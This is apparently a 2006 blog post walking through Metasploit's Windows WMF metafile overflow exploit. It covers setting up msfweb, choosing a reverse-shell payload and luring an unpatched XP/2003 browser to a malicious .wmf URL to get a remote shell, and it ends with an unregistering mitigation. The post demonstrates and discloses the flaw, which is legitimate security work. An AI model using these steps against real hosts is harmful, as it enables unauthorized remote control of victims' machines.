1) Download the latest Metasploit 2.x Snapshot
2) Run ./msfweb
3) Point your web browser to http://127.0.0.1:55555
4) Click on "Windows XP/2003 Picture and Fax Viewer Metafile Overflow"
5) Click on "Automatic - Windows XP / Windows 2003 (default)"
6) Select a payload. For example, "win32_reverse". Make sure you have your firewall turned off, or have a rule allowing incoming connections to port 8080 (or whatever port you choose)
7) Click on "-Exploit-"
8) From an un-patched (this is easy as of today, since there is no official patch for this vulnerability) Windows XP or 2003 host, use Internet Explorer browse to http://[ip]:8080/anything.wmf where [ip] is set to the ip-address of the host running Metasploit.
9) Your Metasploit browser session should now output details:
10) Click on the "Session [number]" link, and you now have shell access to the Windows host! Type in the DOS command of your choice, for example "ipconfig" in the screenshot below:
Lets hope there is a official patch released soon! Meanwhile, disable actions on the .wmf extension. Here are instructions on how to do this from the advisory: on the Start menu, choose Run, type "regsvr32 -u %windir%\system32\shimgvw.dll", and then click OK.
Nitesh Dhanjani is a well known security researcher, author, and speaker. Dhanjani has been invited to talk at various information security events such as the Black Hat Briefings, RSA, Hack in the Box, Microsoft Blue Hat, and OSCON.
oreillynet.com Copyright © 2006 O'Reilly Media, Inc.